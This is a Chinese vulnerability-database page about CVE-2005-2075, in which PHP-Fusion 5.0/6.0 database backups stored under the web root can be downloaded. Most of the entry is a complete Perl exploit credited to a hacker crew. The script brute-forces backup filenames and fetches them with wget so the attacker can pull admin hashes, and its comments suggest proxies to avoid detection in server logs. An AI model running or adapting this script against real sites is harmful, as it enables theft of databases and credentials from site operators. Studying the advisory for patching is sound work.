PHP-Fusion 敏感信息泄露漏洞
漏洞ID | 1108892 | 漏洞类型 | 未知 |
发布时间 | 2005-06-25 | 更新时间 | 2005-06-29 |
CVE编号 | CVE-2005-2075 |
CNNVD-ID | CNNVD-200506-223 |
漏洞平台 | PHP | CVSS评分 | 5.0 |
|漏洞来源
|漏洞详情
PHP-Fusion5.0和6.0版本对web文档根目录下存储的数据库文件访问控制不足,且文件名易于预测,利用此漏洞,远程攻击者可借助对PHP-Fusion6.0版本的administration/db_backups目录下,或PHP-Fusion5.0版本的fusion_admin/db_backups目录下文件名的直接请求来获取敏感信息。
|漏洞EXP
#!/usr/bin/perl
######################################################
# D A R K A S S A S S I N S C R E W 2 0 0 5 #
######################################################
# Dark Assassins - http://dark-assassins.com/ #
# Visit us on IRC @ irc.tddirc.net #DarkAssassins #
######################################################
# phpfusiondb.pl; Version 0.1 22/06/05 #
# PHP-Fusion db backup proof-of-concept by Easyex #
# Database backup vuln in v6.00.105 and below #
######################################################
# Description: When a db (database) backup is made #
# it is saved in /administration/db_backups/ on 6.0 #
# and on 5.0 it is saved in /fusion_admin/db_backups/#
# The backup file can be saved in 2 formats: .sql or #
# .sql.gz and is hidden by a blank index.php file but#
# can be downloaded client-side, The filename is for #
# example : backup_2005-06-22_2208.sql.gz so what we #
# can do is generate 0001 to 9999 and request the #
# file and download it. If a db file is found an #
# attacker can get the admin hash and crack it or #
# retrieve other sensitive information from the db! #
######################################################
# 9999 requests to the host is alot, And would get noticed in the server log!
# If you re-coded your own script with proxy support you would be fine.
# You need to know the backup year-month-day to be able to find a backup file unless the server is set to automaticlly
# backup the php-fusiondatabase.
my $wget='wget';
my $count='0';
my $target;
if (@ARGV < 4)
{
print "n";
print "Welcome to the PHP-Fusion db backup vulnerabilityn";
print "Coded by Easyex from the Dark Assassins crewn";
print "n";
print "Usage: phpfusiondb.pl <host> <version> <file> <extension>n";
print "Example: phpfusiondb.pl example.com 6 backup_2005-06-23_ .sql.gzn";
print "n";
exit();
}
my $host = $ARGV[0];
my $ver = $ARGV[1];
my $file = $ARGV[2];
my $extension = $ARGV[3];
if ($ver eq "6") {
$dir='/administration/db_backups/'; # Directory path to the 6.X backup folder
}
if ($ver eq "5") {
$dir='/fusion_admin/db_backups/'; # Directory path to the 5.X backup folder
}
print "n";
print "Welcome to the PHP-Fusion db backup vulnerabilityn";
print "Coded by Easyex from the Dark Assassins crewn";
print "n";
print "Host: $hostn";
print "Directory: $dirn";
print "File: $file + 0001 to 9999n";
print "Extension: $extensionn";
print "n";
print "Attempting to find a db backup file on $hostn";
for($count=0;$count<9999;$count++) {
$target=$host.$dir.$file.sprintf("%04d", $count).$extension;
system("$wget $target");
}
# milw0rm.com [2005-06-25]
|受影响的产品
PHP Fusion PHP Fusion 6.0
PHP Fusion PHP Fusion 5.0
|参考资料
来源:SECUNIA
名称:15830
链接:http://secunia.com/advisories/15830
来源:VUPEN
名称:ADV-2005-0888
链接:http://www.frsirt.com/english/advisories/2005/0888
来源:MISC
链接:http://dark-assassins.com/forum/viewtopic.php?t=142
Routed数据注入漏洞 漏洞ID 1105381 漏洞类型 未知 发布时间 1998-10-21 更新时间 2005-05-02 CVE编号 CVE-1999-0215 CNNVD-ID CNNVD-199810-014 漏洞平台 IRIX CVSS评分 6…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666